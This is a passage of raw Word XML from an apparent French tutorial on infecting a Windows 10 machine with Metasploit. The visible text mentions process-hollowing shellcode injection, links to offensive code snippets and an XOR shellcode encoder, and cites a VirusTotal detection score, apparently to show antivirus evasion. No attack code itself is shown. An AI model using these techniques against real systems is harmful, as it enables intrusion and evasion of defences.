              <w:t>=true"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39F6F4C6" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRPr="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52191C6E" w14:textId="77777777" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t xml:space="preserve">Le script de Process </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Hollowing</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> pour injecter notre </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>shellcode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> dans un processus en stand-by :</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63628BB1" w14:textId="28649343" w:rsidR="00CC6D6B" w:rsidRDefault="00CC6D6B" w:rsidP="00CC6D6B">
            <w:r>
              <w:t>https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/Shellcode%20Process%20Hollowing/Program.cs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BD2FDCF" w14:textId="77777777" w:rsidR="00132A51" w:rsidRDefault="00132A51">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E156CFF" w14:textId="36703D54" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Son score sur virus total</w:t>
      </w:r>
      <w:r w:rsidR="00EF7949">
        <w:t xml:space="preserve"> en date du 28/04/23</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FFD61C" w14:textId="19875878" w:rsidR="00836727" w:rsidRDefault="00836727" w:rsidP="00836727">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FE57BE7" wp14:editId="34DC94EA">
            <wp:extent cx="5146040" cy="3083540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9841" cy="30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1557" w14:textId="77777777" w:rsidR="00132A51" w:rsidRDefault="00132A51">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D037499" wp14:editId="26DF7193">
            <wp:extent cx="5146159" cy="316643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4931" cy="317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B39662" w14:textId="0AAE8788" w:rsidR="00836727" w:rsidRPr="00132A51" w:rsidRDefault="00132A51" w:rsidP="00132A51">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4462E1" wp14:editId="06C50116">
            <wp:extent cx="5146672" cy="1977656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325" cy="19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836727" w:rsidRPr="00132A51" w:rsidSect="00132A51">
      <w:headerReference w:type="default" r:id="rId31"/>
      <w:footerReference w:type="default" r:id="rId3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BAF6" w14:textId="77777777" w:rsidR="00236C4C" w:rsidRDefault="00236C4C" w:rsidP="00DA44B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="55254D28" w14:textId="77777777" w:rsidR="00236C4C" w:rsidRDefault="00236C4C" w:rsidP="00DA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3DD8" w14:textId="77777777" w:rsidR="00132A51" w:rsidRDefault="00132A51" w:rsidP="00132A51">
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="6497"/>
      </w:tabs>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="32"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="00836727">
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve">Rédigé par </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00836727">
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>Anseaume</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00836727">
      <w:rPr>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t xml:space="preserve"> Benoit</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="0F43E12D" w14:textId="77777777" w:rsidR="00132A51" w:rsidRDefault="00132A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850D" w14:textId="77777777" w:rsidR="00236C4C" w:rsidRDefault="00236C4C" w:rsidP="00DA44B7">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="42001997" w14:textId="77777777" w:rsidR="00236C4C" w:rsidRDefault="00236C4C" w:rsidP="00DA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8A3C" w14:textId="36134C12" w:rsidR="00DA44B7" w:rsidRDefault="00DA44B7" w:rsidP="00DA44B7">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t xml:space="preserve">Infecter un poste Windows 10 moderne avec </w:t>
    </w:r>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:t>metasploi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C51D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5CEEA670"/>
    <w:lvl w:ilvl="0" w:tplc="30A48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B7"/>
    <w:rsid w:val="00132A51"/>
    <w:rsid w:val="00236C4C"/>
    <w:rsid w:val="00300238"/>
    <w:rsid w:val="003C2F17"/>
    <w:rsid w:val="007A063D"/>
    <w:rsid w:val="00836727"/>
    <w:rsid w:val="00A05A0E"/>
    <w:rsid w:val="00A8290F"/>
    <w:rsid w:val="00AB1670"/>
    <w:rsid w:val="00AB4BD6"/>
    <w:rsid w:val="00CC12A1"/>
    <w:rsid w:val="00CC6D6B"/>
    <w:rsid w:val="00DA44B7"/>
    <w:rsid w:val="00EF7949"/>
    <w:rsid w:val="00F5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C556"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D7DB069A-074B-473D-A559-AE853D97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4B7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA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4B7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00DA44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44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44B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A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B16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3C2F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chvancooten/OSEP-Code-Snippets/blob/main/Shellcode%20Process%20Hollowing/Program.cs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li.org/get-kali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customXml" Target="../customXml/item3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dotnet.microsoft.com/en-us/download/dotnet/7.0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hyperlink" Target="https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/XOR%20Shellcode%20Encoder/Program.c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customXml" Target="../customXml/item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95A4893DAB84299122D2262AFDD5A" ma:contentTypeVersion="11" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="234080871528521182284ce87dbd818b">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="fb4b45e4-8d06-48e6-9043-1f15d5d6bcaf" xmlns:ns3="0ae3aa86-3e06-49e1-af14-974f37f52190" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="c67218207badf9943cebb03d6c5698e0" ns2:_="" ns3:_="">
    <xsd:import namespace="fb4b45e4-8d06-48e6-9043-1f15d5d6bcaf"/>
    <xsd:import namespace="0ae3aa86-3e06-49e1-af14-974f37f5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45e4-8d06-48e6-9043-1f15d5d6b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ca3966c-5ee7-472e-b92e-9c8ee28c7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aa86-3e06-49e1-af14-974f37f521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87a882-d0a6-4b9e-ba42-6217d6d2790c}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="0ae3aa86-3e06-49e1-af14-974f37f5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99EBF-1C17-46BC-AFAA-1E63779A5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E74A0-A868-4542-B641-15C40FE78C0D}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F79DB203-23F2-4152-81A3-B3CA9B0E31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ANSEAUME</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Benoit ANSEAUME</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-27T19:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-28T08:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>